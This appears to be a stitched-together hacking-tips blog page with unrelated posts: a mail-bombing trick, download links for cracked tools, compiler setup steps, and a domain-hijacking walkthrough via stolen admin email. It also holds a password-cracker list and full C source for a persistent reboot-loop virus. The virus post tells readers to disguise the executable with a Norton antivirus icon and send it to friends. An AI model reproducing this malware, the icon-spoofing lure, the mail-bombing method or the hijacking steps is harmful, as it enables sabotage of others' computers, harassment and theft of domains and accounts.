How To Do Mail Bombing
In internet terminology “mail bombing” is referred to an act of sending or forwarding huge amounts of email to a particular person’s mailbox or system. By mail bombing somebody’s mail box, you can actually fill up or overflow or overwhelm the recipient’s mailbox space. It can create great inconvenience to the recipient and cause the recipient’s server to have technical faults such as stop functioning, becoming slow, etc. Many people are of the opinion that mail bombing somebody’s mail box is an unethical behavior and the sender should be hung, quartered and disembowelled.
Having said that, something that is seemingly bad may not necessary be so if used correctly at the right place and the right time. If you know the mail bombing skill, the skill will help you when you are required to send huge amount of email to a particular person. Take this scenario, for instance: if you have quarreled with your girl friend and she insists you write 100 apology letters to her, then you will find this skill extremely useful.
There is a small trick here that tells you how to send out an enormous amount of email to a particular person. It is free and quite easy to use. However, this trick is only workable if you use Yahoo Email Service. We have tested it with Gmail and it is not workable. To initiate this trick, of course you need to register as a user with Yahoo Mail. Login to Yahoo Mail and click “Compose” to write a new email message.
In the “To” field of the new email message, type in the email address of your target recipient. In this case, we use mailbombing@microsoft.com. Copy the same email and paste ten times or MORE (as required). Make sure each address is separated by a comma.
For instance:
To:
mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com, mailbombing@microsoft.com
Subsequently, you need to capitalize one letter or a few letters in each email address. You must capitalize different letters or group of letters so that no two addresses are the same.
To:
mailbombing@microsoft.com, mAilbombing@microsoft.com, maIlbombing@microsoft.com, mailBombing@microsoft.com, mailbOmbing@microsoft.com, mailboMbing@microsoft.com, mailbomBing@microsoft.com, mailbombIng@microsoft.com, mailbombiNg@microsoft.com, mailbombinG@microsoft.com
If you send this email out, your target recipient will receive 10 emails from you. As mentioned earlier, this trick is only workable by using Yahoo Mail Service. If you use Gmail Service and duplicate the same, then the recipient will only receive one email and not 10 emails.
If you want to make more email, what you need to do is select the 10 email addresses which you have capitalized and then paste them to another new email. If you duplicate the same process 10 times, the recipient will receive 100 similar emails from you.
This knowledge is not meant for rampant bombing of your friends or colleagues’ mail box. Your Yahoo Account will be terminated if your recipient makes a complaint to Yahoo!
http://rapidshare.com/files/157456180/NetTools5.0.70.part5.rar
Broadcast pre-recorded videos on instant messengers while chatting
Fake Webcam - it will broadcast just one movie to all the messengers at once.
Stream/play videos and movies on Yahoo, MSN, AOL, Paltalk, ICQ, Camfrog, and on all messengers instead of actual Webcam. It stream videos and movies on your messenger just like an actual webcam.
You don't need to have a webcam for webcamming. Enjoy pretending someone you want to be. Your chat mate will never figure out that it's not a real webcam.
Here are some key features of "Fake Webcam":
· Play pre-recorded videos without even having a physical webcam
· Have a virtual personality
· Keep your privacy by pretending to be some one else
Download from Easy-share
▼
▼
▼
http://www.easy-share.com/1906648135/FW6.1.3_downarchive.info.rar
OR
http://hotfile.com/dl/8136239/c2b91de/FW6.1.3_downarchive.info.rar.html
Advanced RAR Password Recovery is an application that helps you to recover forgotten passwords for RAR/WinRAR files. We’ve all had the experience of not using a file for a while and then forgetting the password. This problem is solved with Advanced RAR Password Recovery. With it you don’t need to keep a record of your passwords; if you forget one, you just operate the program and find.
▼
▼
▼
http://uploading.com/files/Y7VNGA9L/Rar_password_Remover_Priv8.rar.html
OR
http://hotfile.com/dl/8797510/3a1d99c/Rar_password_Remover_by_onel0ve.rar.htmlFull Speed Internet Broadband Connection v3
Dramatically speed up your existing Internet broadband connection and get the best performance possible from your current Internet access. No technical questions; just one click and it’s done. Free Internet speed test software included.. Full Speed will increase your online Internet speed with everything you do: faster downloads, web browsing, data streaming, e-mail. P2P and gaming.
Features:
* Faster Internet access
* Faster download speeds
* Faster web site browsing performance
* Improve Internet and Intranet performance
* Quicker data download times
* Improved streaming music and movies
* Faster download for songs and video
* Faster performance with email
* Better download speed for all data
* Faster loading Web graphics
* Speed test for Web site browsing
* Speed test for general data transfer
Tested over:
1. T1, T3, Cable, DSL - SDSL, ADSL
2. VPN and direct wired WAN/LAN
3. P2P, Remote Desktop, File Sharing Software
▼
▼
▼
Some times it becomes necessary to change the ICON of an executable(.exe) file so that the exe file get’s a new appearence.Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user.But in reality when the file is carried to a different computer, then it shows it’s original ICON itself.This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself.Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.
For this purpose I have found a nice tool which modifies the exe file and will embed the ICON of your choice into the file itself. ie:The tool changes the exe ICON permanantly.
I’ll give you a step-by-step instruction on how to use this tool to change the icon.
1. Goto www.shelllabs.com and download the trial version of Icon Changer and install it (Works on both XP and Vista).
2. Right-click on the exe file whose ICON is to be changed.
3. Now you will see the option Change Icon…Click on that option.
4. Now the Icon Changer program will open up.
5. Icon changer will search for all the ICONS on your system so that you can select any one of those.
6. Now select the ICON of your choice and click on SET.
7. Now a popup window will appear and ask you to select from either of these two options.
- Change embeded icon.
- Adjust Windows to display custom icon.
Select the first option (Change embeded icon).
8. You are done.The ICON get’s changed.
How to install Borland C++ compiler
1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link.
http://www.codegear.com/downloads/free/cppbuilder
2. After you download, run freecommandlinetools.exe. The default installation path would be
C:\Borland\BCC55
How to configure Borland C++ compiler
1. After you install Borland C++ compier, create two new Text Documents
2. Open the first New Text Document.txt file and add the following two lines into it
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
3. Open the second New Text Document (2).txt file and add the following line into it
-L”c:\Borland\Bcc55\lib”
Save changes and close the file. Now rename the file from New Text Document (2).txt to ilink32.cfg.
4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to C:\Borland\BCC55\Bin and paste them.
How to compile the C source code (.C files)
1. You need to place the .C (example.c) file to be compiled in the following location
C:\Borland\BCC55\Bin
2. Now goto command prompt (Start->Run->type cmd->Enter)
3. Make the following path as the present working directory (use CD command)
C:\Borland\BCC55\Bin
4. To compile the file (example.c) use the following command
bcc32 example.c
5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).
6. Now you have successfully compiled the source code into an executable file(.exe file).
NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
- block_usb.c (source code)
- unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this – How to Change the ICON of an EXE file (This step is also optional).
Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include
#include
#include
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.
Compiling The Scource Code Into Executable Virus.
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, How to compile C Programs.
Testing And Removing The Virus From Your PC
You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run
There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .
Domain Hijacking – How to Hijack a Domain
In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.
Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
The operation of domain name is as follows
Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.
2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding let me take up a small example.
John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
What happens when a domain is hijacked
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case the John’s domain name (abc.com) is said to be hijacked.
How the domain names are hijacked
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.
Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.
How to protect the domain name from being hijacked
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.
Top 10 Password Crackers
Each tool is described by one ore more attributes: | Generally costs money. A free limited/demo/trial version may be available. |
 | Works natively on Linux |
 | Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants |
 | Works natively on Apple Mac OS X |
 | Works natively on Microsoft Windows |
 | Features a command-line interface |
 | Offers a GUI (point and click) interface |
 | Source code available for inspection. |
Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:
| #1 |  Cain and Abel : The top password recovery tool for WindowsUNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented. |
| #2 |  John the Ripper : A powerful, flexible, and fast multi-platform password hash crackerJohn the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here. |
| #3 |  THC Hydra : A Fast network authentication cracker which supports many different servicesWhen you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC. |
#4 |  Aircrack : The fastest available WEP/WPA cracking toolAircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files). |
| #5 |  L0phtcrack : Windows password auditing and recovery applicationL0phtCrack attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, then re-acquired by the original L0pht guys and reborn as LC6 in 2009. |
| #6 |  Airsnort : 802.11 WEP Encryption Cracking ToolAirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack. |
| #7 |  SolarWinds : A plethora of network discovery/monitoring/attack toolsSolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more. |
| #8 | Pwdump : A window password recovery tool Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file. |
| #9 | RainbowCrack : An Innovative Password Hash Cracker The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. |
| #10 | Brutus : A network brute-force authentication cracker This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra. |
airodump (an 802.11 packet capture program)
aireplay (an 802.11 packet injection program)
aircrack (static WEP and WPA-PSK cracking)
airdecap (decrypts WEP/WPA capture files)External Links
Visit Aircrack on Freshmeat.com Download
Download the Package (Working Mirror)
No comments:
Post a Comment